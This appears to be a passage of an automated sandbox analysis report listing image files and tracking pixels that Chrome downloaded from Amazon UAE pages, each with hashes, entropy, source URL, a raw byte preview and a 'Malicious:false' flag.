                                                                                                                                                                                                                                                                      SSDEEP:192:Ym0kcHGqaV4LMM67mdanbf/gmmj2HiZrPRGmU3r8r93rZlS2oztBfubDX8PbmtYD:PoHGqaV4LxonjgmFkrPQTr8r9jSR1ABC
                                                                                                                                                                                                                                                                      MD5:41E60F7A1D6139539601FABD8F36C3CB
                                                                                                                                                                                                                                                                      SHA1:1F3F310B59336A8AF90875ED9BB4B09AC2185ED3
                                                                                                                                                                                                                                                                      SHA-256:BAA6F9ACD8469789404573EC33A27D763E9AA979B6831EA39D47528D3BD25028
                                                                                                                                                                                                                                                                      SHA-512:450E6B65F2D43E59882186BDEB4CAF335F63C4574C33BDBC4C880E53EA9839466F0E003B947A04058530F7554555FB4EF1E5A2C3A2A7A36B5C09AEF326402077
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................................................................................................................."..........2.........................................................................x8.}W.=.).7*y&-......{................}..(....:....kQ<..s^.GN...&...........W...V.9w.:........z....2..V........8..t.F/D#...........y...6...).....yP.v0.} H....k...vd........3k......4$t.s.........{..0z........>..}...9.vm..|..M........I.W.o.........~.S....../\R..g...)q.;..x..j..>.G@.....C.o]..l......0......k.[D...zp.M?..8O....u<..[.4.rz..`......Ku...*.>r.'..i...y.=e6uU.k...S..z3..=.....6<..[.Tq.f...V....w.H.....7o~k.....z...z.....r..*....d..K,2By.....^k.....X..G.2.m<f/z..\Ww`..^....oS..y..5.48..`.@..#....^.b....R.RxnK....<.....x{.<..!.].G.....;.^?....W...t......].?=.^....7..|...,}..y.....I.y5..>..9..R. .....X.j....B...2..f....iiOq..S\.D..~....EE.....Wv6S..k.....YN.^lW.R.-<A..\......q.............7z..i...h..@.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 440x280, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):11753
                                                                                                                                                                                                                                                                      Entropy (8bit):7.923927182992249
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:1k9PIUXOD5zsRS/fa9h8mLp2/qWB0eR1KV76HF8cBGaWUdtCtyAtTAeKyDB:1k9ReD5zjcZZw1eiBGaWUdItzTAfg
                                                                                                                                                                                                                                                                      MD5:9F990697A77EA921EF1614F6B334E46F
                                                                                                                                                                                                                                                                      SHA1:FFCB75979E5C727BBEE45F4D9F292C243302DA9F
                                                                                                                                                                                                                                                                      SHA-256:0F9F728BB5F7B625C6D551080BEAD7A84C4EF9B53B89C382E9B7B2F2528C1CA1
                                                                                                                                                                                                                                                                      SHA-512:039D9DBCDFDED284046C9550CBA04AB6E3421A3B1E5705F0B0051A02B01C9901EB6D09A879286D26F3C540633B0E2B12BBC7508087D9453D6C948411EF318ADD
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."................................................@.................$.I...}...n........y.1, ..M......0k......X......Z.....{X.fP...R.....+.b....YY......l.....<....Uwf..b.Q......}f...D.m..{.......G|.....^Y...C..oKnY._ ....@....].....Z...N}......}l!..._ZA.-.(..s.0...P...szs.G.7%Y..W..BeJ.d_...w .B..[..Z..A.Nl.:B.....S0.Nc..&...{.>.....OM..Tu.T.&.Kso....D....T.......................{`W4.........".........../....?{,......G.5<..E......f..5.._...?......O.;..R..^GF.DG...._...^3...uQi.mSS...V.?N..[7.....T.y{........u....T..-e.wC()OC.r..g...j..-.7]V5.hI9....t....k.$........k...^.X.'.$Tu.X.};.....i.....E....].'....9mkK....-.]...&......VE....._ak..P.....5..e.g.5.Jz+..../..=U.j.w.N.....{..H(..+.6.....-*z....E..,.....;..mc..7y.W>...}..7.{...EGm[.>..s./........K..m.....|C....r;%..E!....M
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):3883
                                                                                                                                                                                                                                                                      Entropy (8bit):7.875810018140517
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:dQVJKP+PTO/+z1alEWH5x7CtGYyTYuDG0k8jBpc1:Cbu+PqE1alNZxGMGum8Tc1
                                                                                                                                                                                                                                                                      MD5:8BEE7097B80CD50DECE3C9D385751B73
                                                                                                                                                                                                                                                                      SHA1:568D1BBFA14F4E953B77CC0D5505BC1C4FC0FDDB
                                                                                                                                                                                                                                                                      SHA-256:C49FA7C935A7612FA999DABEA9A46CC5ADF1950AA56C9CFB39930DCBF409BFEF
                                                                                                                                                                                                                                                                      SHA-512:F2AF18F844D24DD032AFB0AC9B36B76E3855521DDDAB47C132E684F32187D3626863BC040F1DA45BC65B2BD11F98646672C2D2E8445439CA09E970DB346F4B02
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/OHL/BTS/QC/Updated/2407GH048_AE_OHL_DQC_Pricepoint_LargeAppliances_EN_1x._SY116_CB567104843_.jpg
                                                                                                                                                                                                                                                                      Preview:.................................................... ..,+++,1111111111............................................!!..!!))())1111111111..........Adobe.d...........t....".....................................................................................!.1.".2Aaq.BQ..#$345Rrst.....%...6Cb..........................!1..AQq.."2a.4BCR....#3r..............?....h""...." ...""...." ...""...." ?.....h"".......q.Q.`.......tdt{....a..J.P^.)&.....&*w....uC6......._.Wo..~|........"..m?.....3.i.+..b...}..$..i$........./v}Vc..j=ai.ih......#.H....x<.p./...z8.C;K%.[.O...L....E.v.r/.....#NY|..(e...Y;#kg.7c|.`.n}.pq...[[..)....0E....y. ....)......c....v.....1K.>.zo/...W..O.O.]6)<t.M.5|.1.o...ol..l..g.f.@..H......ZZl.>.F.SX.........\@...*.r....mU..x..m...#r<...^...mps..=.N..6?.h...{B.m_.%....jI.8.G..../..m...Qu.......uY...._X*&...J...lL.0e....`.~..5o.....Z[.nN.&uK"tA./w...w...z6....jd...-.~......q..uI....O.(.r.5.(..U.e.").." ...""......h""......8.c....a.p..}....d:n
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:PNG image data, 1 x 1, 8-bit gray+alpha, non-interlaced
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):68
                                                                                                                                                                                                                                                                      Entropy (8bit):4.241114311932129
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:yionv//thPlE+tJ8/V+/C/5lO1+dp:6v/lhPfA/UP1+p
                                                                                                                                                                                                                                                                      MD5:91E42DB1C66C0B276ABF6234DC50B2EB
                                                                                                                                                                                                                                                                      SHA1:C1986AF3C26609B8B7D8933F99C51C1A89E9EA6B
                                                                                                                                                                                                                                                                      SHA-256:63EF318D96B5D0D0CEBA6E04A4E622B1158335CDC67C49E27839132C6F655058
                                                                                                                                                                                                                                                                      SHA-512:0B77019542FDB02F72C8407A379579BDE36E2FE3AF81B1C74553F1B5DF2590373BF7E6FF3FEFCBDAF0B9A2FCF9B1E57B30D24E29810F0CFAF9D51153415C89CE
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/G/01/d16g/kpw/transparent-1x1.png
                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR.....................IDATx.cd`......0../....IEND.B`.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUnl/tExltxlHh/:/Ob/
                                                                                                                                                                                                                                                                      MD5:58B6EAB85C3D693580CE3B2D5E559C37
                                                                                                                                                                                                                                                                      SHA1:894476FCCD60AF0E4842D8657A36D8186E34A382
                                                                                                                                                                                                                                                                      SHA-256:39F08C4011AC739FB84EB16366FB23338E4DF27D54A459327A95C99C03512FFD
                                                                                                                                                                                                                                                                      SHA-512:E5E5C896EDB21F6A6F420055516877577F6EF4A00492CA9A76E72AA95D0BBAA2E86C4897C1EAE1D449E7B5DAF0EDB8D42E4CD8CF837FD9BA5859B2B833AE9020
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-na.ssl-images-amazon.com/images/G/01/blank/1x1_b._V192262818_.gif
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x313, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):31229
                                                                                                                                                                                                                                                                      Entropy (8bit):7.984160951671787
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:ZgXUlE+tEs4N5WqwM4sJkceveJLLqCGcH3svHyAv:Z9e+tiNAqwYJkiWN+3mHVv
                                                                                                                                                                                                                                                                      MD5:E86B02934AE6085ED869E245BB50287F
                                                                                                                                                                                                                                                                      SHA1:9AA156D6DA149C1ACA256626DA72BAD6D72D6ADC
                                                                                                                                                                                                                                                                      SHA-256:EF2110BC3C35FFAEF2C6DDADD08805234C1AA8C43EE40C5EE223A15C18594770
                                                                                                                                                                                                                                                                      SHA-512:9A95167EC2A085E08BD9010EA69CB4B84EBB43829A8A17ADC0C81A1E26C2DE045DBD5CE96F74027400A415092FF5E76F03E9DD67AAC5E9D503CE3DB920972AF3
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/71gFU9n0ZtL._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......9.@.."..........5..................................................................$.y...|.e.)Usj1m*.B`..O.9%.I.I.I.I.I.I.I.I.....0.L{\..;.ST.........>...-..=.U.l..|.cc8.......&>..)E.....Viy..@.@.@.@....;.f6.W..Z..|..$...Z..9.$;..F..$.u.x..........I.....b_.2%.U....l37....VGhT...w......*t&V..z$@=.......!4.e5..O.)....Xa<....1...#..-:>.}.0....{..^..F..eq.F...........S.^...>E.9..^a..'!..^!&95Y.5.....^{.i...........esQ.....t+(.Q.=.6]lGD.M#.9J;O.n..I.(....Y..dT...\\.G....y.P..;xk.`._p.]y.....L....;.......o...=!S..,7.<.!..:...#....n../.y....H.{...p.f...=.9....k.1..0..aa..m...$be+....,r.r..9.'n5.n...{s7L...5.........Y...u.UZ.>..\.#.S.t=..5V..f]...X....kSYH.j.........B7l..\.......*..y...XdC.Z..3.j.....[.`.@..X..~...~M..^....z.|.M....;....pN.&.#T.E.Il.5N..1..a..qM...2.,...A{.r..iu......%S.X.;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUnl/7yltxlHh/:/+/
                                                                                                                                                                                                                                                                      MD5:07FFF40B5DD495ACA2AC4E1C3FBC60AA
                                                                                                                                                                                                                                                                      SHA1:E8AC224BA9EE97E87670ED6F3A2F0128B7AF9FE4
                                                                                                                                                                                                                                                                      SHA-256:A065920DF8CC4016D67C3A464BE90099C9D28FFE7C9E6EE3A18F257EFC58CBD7
                                                                                                                                                                                                                                                                      SHA-512:49B8DAF1F5BA868BC8C6B224C787A75025CA36513EF8633D1D8F34E48EE0B578F466FCC104A7BED553404DDC5F9FAFF3FEF5F894B31CD57F32245E550FAD656A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 440x350, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):33831
                                                                                                                                                                                                                                                                      Entropy (8bit):7.972780140530749
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:9SOtZxpgZPmsNlcdYDREdRh7T2TiKgXREi+SK16u1RAXuJJ:9SOxKZ52dRh7T2WFQmqAXA
                                                                                                                                                                                                                                                                      MD5:78C6C6EFA8C7AEF0F2DA4AA3E5601D62
                                                                                                                                                                                                                                                                      SHA1:DB5152ADF8D3C770C2349CD29C5CE57A486009EC
                                                                                                                                                                                                                                                                      SHA-256:CE95006330B0047059B5AB0787ED6A323D86D8D366580D176B3E7EA8D4594AC2
                                                                                                                                                                                                                                                                      SHA-512:EAAB9DDC4881078E68B2C722F7B1B2878B37ECBE4AD75080456E84B9FE37377267A4A921C8E06E3212F4D3585A3AA6B9CBEA07E49B10FD17220E8E79BAA0C33E
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF.............C............................................!!$$!!0///06666666666...C............................."......". ... .%%""%%//,//6666666666......^....".......................................T........................!1.AQ.."aq2...#B......3Rbr...S....$%Cs....&56DTct....4..7...............................5.......................!1QAR.....23aq".......Br.#Sb............?...Gi..w.w.Y8z.\=.$.Pt,..I=k..P.F.n.o..!.LLk!N...|(....+g6G,..9..#...`O_=...4..;lz.O..D..F6...t!]A.n..&.....S..jN.F.=.........s....z...Z.(.C.....).s...h..:..1.R.'Mcr}9{.\...I.:P..y..E..r.....e......~A...#...N.S.AB%.9H.h...I...>.:..e...@.O....$0.}.]:EH.tI..........y.g.B.ok]u...@PP..b.....?TH.v...,.zu.I.". L.J...*h..k...)QB9n.H$.3..ZP<.......Q...G..=@..z..fM ..=...R.:......X"6.`...M4....}z.YI0..JP..]..X........_.....J.Ti..A?....1..88d.. .....D..A..4..j..........A...3...._...............0N.."...aGK..5r........o..................F..eo1..]).G..:K...1....I.s..Dy...\...L.=.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:3YMHCN1ADEMYQEW81YBE$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295396.0%26id%3D3YMHCN1ADEMYQEW81YBE%26m%3D1%26sc%3Dcsa%3Asi%26si%3D2884%26pc%3D7783%26at%3D7783%26t%3D1724264961819%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D15149894031%26tid%3D3YMHCN1ADEMYQEW81YBE%26aftb%3D1%26lob%3D1:7782
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):4545
                                                                                                                                                                                                                                                                      Entropy (8bit):7.736991922753956
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:TygDlbTZKzNCprNgXPYk2Q179xasZdoWqL6iFY0ffLMpyanMa6ocBBEn:LFQzQrWYZQ1aKqm+LMpjYlGn
                                                                                                                                                                                                                                                                      MD5:17DF364681523AA2F7FABB10C5EF9BA1
                                                                                                                                                                                                                                                                      SHA1:DC6A21B6B8E1FB096F6B83088160F4982B9F74D1
                                                                                                                                                                                                                                                                      SHA-256:6D1F74501168A247C6F8B677D118F31981B35AED93872AB8805AE8A083BC6945
                                                                                                                                                                                                                                                                      SHA-512:D8F410E5B3B385784998EEE94B8928080C1A4C9886D25CFEE9AC0FDE4DFF7DC5C6429D1675E337670DB860B26EED9A66A13EC987DFEBAE7CCC5CFB29A8A87488
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:"https://m.media-amazon.com/images/I/41IU10DZeDL._SR240,220_.jpg"
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........1.........................................................................................{0...1.i|..SS5}....@...*j.........z..EX.iL.?\[a,...y....]Q.3.........X...)um.`....4{..A..]g.O.v<..;.5\.tN..d[&...=.V?+.9..w.........5.E-......X&.B.UBZR..w.....l..N.."...f..,.............7..<FJ..l.~..(...^.n.[6U...}........=a..d...<o&/..pY.I#.vs|]..e.Y.m.....n}.-.........8.^b..7..'....od./....n.6....&..}|.w.l........e.4...r..ltx...3.Z...Z.|Y..1...<.M..~Q...j......HtLt[.5r"@.H......0}.../..~=G.....?Q..y..@......................................-...........................!3. 02@."#1ABpQa.............3..~hW6+.........t/...j...f......`....v.\.5#..Mo.|9,..e$s.....u.Uy8l..Ql...~..._....m.S...OK..%%.#q.^..\..^..a.Y ...E.R.i...f3.........m.s..6....0Mr.*.....j5.c. ..}..y......S..qG...w....!.V.8.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 440x400, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):30095
                                                                                                                                                                                                                                                                      Entropy (8bit):7.910652131862544
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:BLUaWuCibSxe/NVIzDOcx6l/EeF+6144oN97:ZUa69g/NeOBOh61KF
                                                                                                                                                                                                                                                                      MD5:CD9AAC7A7435CB631FAE9CDBDEAA5FE8
                                                                                                                                                                                                                                                                      SHA1:A52122566B0D8FD6186E77F2E35BF6653E642221
                                                                                                                                                                                                                                                                      SHA-256:FA5AF1F41A7CA1DDFF4ED87F38F1BAB9F4E06A8AAA64E9E5235C9648AB9965B0
                                                                                                                                                                                                                                                                      SHA-512:C836940BCE98A9E1AEE00B0D244DBF9DDB4BC2E328307C297B7943D50D2A9C4F099C441223B92A708C875B908D59C83536F74FB2C23F3247AAFE5986D3641756
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/rbs_ohl_outdoors_silver/xcm_banners_mena_440x400_coop_6col_phl-egardenkart_440x400_ae-en.jpg
                                                                                                                                                                                                                                                                      Preview:.....C....................................................................C............................................................................"...........................................C..............................!..1"..Aq.#2Qa..$Br...3...%R..Cbs...................................6.........................!..1"A..Qa#2q.....3......BR............?..@.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .T+.`o.>.M.m-..5..\.2m...P.5....).fc....l...|O.....>L.......4.!Y.R....2."/.I[J{...'.dg.?....h!.)r.n...*.%...v..SJ....DG.}..|..$h.|.....)..4F..x..9..v..d.^.1................o..EwO.........._...>F..A. ..O0.....I.../..#..../..O........a......................................................................=.a&...%.....i%..p.....H....~|._./.....[..H3&..3JIG.....3#"3l...{.#.>..z.....|.......0?....v._.\.)ki.djZ..mD..{O.K
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 440x400, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):51019
                                                                                                                                                                                                                                                                      Entropy (8bit):7.967231046283993
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:LZVHpF7zYhg+vH8SzM7e8wUdyYzdBiC7LXozN1p+rnOSXkkNEKaEJrWJhZw:V9pF7zUogM7euHh7LM7WOUNEKpJKi
                                                                                                                                                                                                                                                                      MD5:A1072F5C25EB0C2D0D2B308EA9FD3C1C
                                                                                                                                                                                                                                                                      SHA1:B567447863FEAA00697781FC12BF3396328ED349
                                                                                                                                                                                                                                                                      SHA-256:8FB7678659ACA80D3D41C0A6F34C2843A840C20882E75A47E37CB35B8E82A3D6
                                                                                                                                                                                                                                                                      SHA-512:D8C9AF7F4129358E56FDDEAC0D560A0E1F1B6761706952BA9E669A76A7EFDF5D8494AC6E852E2B9118D892AF7FE55E74B3C4EDCB9E779B7E975BC0FB7B565ABE
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/rbs_ohl_outdoors_silver/xcm_banners_mena_440x400_coop_6col_phl-bestway_440x400_ae-en.jpg
                                                                                                                                                                                                                                                                      Preview:.....C....................................................................C............................................................................"...........................................J..............................!.1."A..2Qa.#q..$....%39BR.CXv.....5TUb....................................@........................!..1A..."Qaq...#2.......3BRbr.$C..Vs..............?..C..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..x.;...=...........w.#d..K.Q6....U.. ....]..z.b....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 750x300, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):32669
                                                                                                                                                                                                                                                                      Entropy (8bit):7.96908499442983
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:1FB6bRfXJ1uWTUGbKccpzFYvpwBHlrQ8YlusE2zoctrCEzYVq:l6bVXLDT9nSF+nlvJoctrCEx
                                                                                                                                                                                                                                                                      MD5:B84FCDE85FE73D9CC5DF02D9DD15E0AC
                                                                                                                                                                                                                                                                      SHA1:4310A8FFE0F4E6882FE1292EBFCCD9F6341AF413
                                                                                                                                                                                                                                                                      SHA-256:7F6DAB5B2F7F984EFE4DC95A1186DF30778FB6CA9C66277FEC90E97A8DC3E113
                                                                                                                                                                                                                                                                      SHA-512:DBA5653EC914C7B89221469E1A2DBAA4EACA9D2A03551BC8AB642273D070C5770C4BA49FB7DD2DE667992D99471D531BB3ACCE0535F90903D881077BE6913B8E
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#........,...."..................................................ng.Z.(......-rZ../..x.=Y5Tp..y'.=7T.................Y'..LxC..#.5V..l.xq.....?...e:v.............1...f.+.]...J.~.....:.gp/$,.H.i.p...u@..............5KD..f.@8}>.qh.s....my.Fu.J.7.-~7..z...H.....EP/..2.*..f......bd.[.4...U......c~8.....K..QNd..h(....;P.2(..x.4..9q.h.Y.]...c.L./......77...SsH..*.s..&.4.l9.SR6....w.....#O.@8...g..=..y..9)B.NJ*v..n.P....b.=.E^..W..G).gv.=}..iu...6.4a.._lp.G....~...p..q.....P....bd/'..<.2.p.;....]T.$.%l.AU..,$A...j:....`.'...................K9.L>..m~.`.....De..>.........j@....(".U.....k1.%...O5&"...{/g.....h....Q..R..7y.T.$...[Z...+......-SQ.".@..e.FK....A%.v.J../.>.\........^.u...p.>.....w..W.......["...x................JQa...n.^..|:8moyU_.t.PM..;p..=S..t...............H.].![.....<.t.C......u........,.....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 440x500, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):27437
                                                                                                                                                                                                                                                                      Entropy (8bit):7.96948006818367
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:1PhbmmrY7KHZ/yrLGzaRIrgF7qqpJBK+50Xr:7bmm6g9y2z6Irk7qqTBK+50Xr
                                                                                                                                                                                                                                                                      MD5:A47FB8413D402D108A7BE050036CEF81
                                                                                                                                                                                                                                                                      SHA1:0ABDB1B9587B206DAC5B7CF73DC9295821AD0641
                                                                                                                                                                                                                                                                      SHA-256:3793325AF961C68B6F2F53C5166B58FCBAEB5E4B4486A7262EE38BA701277EBF
                                                                                                                                                                                                                                                                      SHA-512:3E7FDE2837F9D1ECC0A8B55CC19C254BE0E6639B8540F5BFACA58D3BADBA4FD90687DA66FE4557A9B8252FF5359542C0F16B2266B316CC71148B5EFA888D37F2
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/sports-outdoors/revamp2022/EN-L2-Fitness-Apparel-440x500.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."................................................Q...(..((+...(.(".. !QTr..(......A...... .QQ.*..*#.PUc..U..E.P.D*.s.*...QE.Q...E..E...@Jo.......U^7...._@x.....2DQ....8......O........h....,..UD.*...(.[.xc..]..~....lp...-.C....*....V.QT...j.>+..."....k+....9j...5v..J......Z..T....rc.....u<.....?....(.s(.....PDbGV.x..B.oM.rz].|.ym...W.......@....#..:.A..ru...:..9.....3.g...'E*...%v.@h.l5..V.1.8]......u ..{......w......X.....z..S..B.....P.;f..s|...k....@......H..\...>..b..aff6..}>E....I..vq..\...X........X....V.eZ....v.5,.)P]..O.....B..^Q..* "28`.O.Kl...&.Y.Y....Y2[.4<.R.S..+.'AP.i....(.m:;..G..c.....w.N.J7..F.5.K.s{..s..B..Qk[.Jq"E.tZ..4.......N...hr..kZ69y=...m.AP.....bA^..>...nH`.J.O... c+..y....u.?..[OE.2...*..^.k.=?..V..J.z?B...)..s..:*<9.K$.A.\..N&6*u......f..n#Yw7..,.<.v......#E}/..yK]..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 379x304, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):25781
                                                                                                                                                                                                                                                                      Entropy (8bit):7.965987596311549
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:70v/om1nzDPGjupe9YFu6npeeG1N3DO+y:Dm1n/GjupegzLGTzOb
                                                                                                                                                                                                                                                                      MD5:DD3025FBA8198FE551489BE56F9045FD
                                                                                                                                                                                                                                                                      SHA1:6BD2557DD7A1E1AEBBDD9E17C9E50060BC22D44A
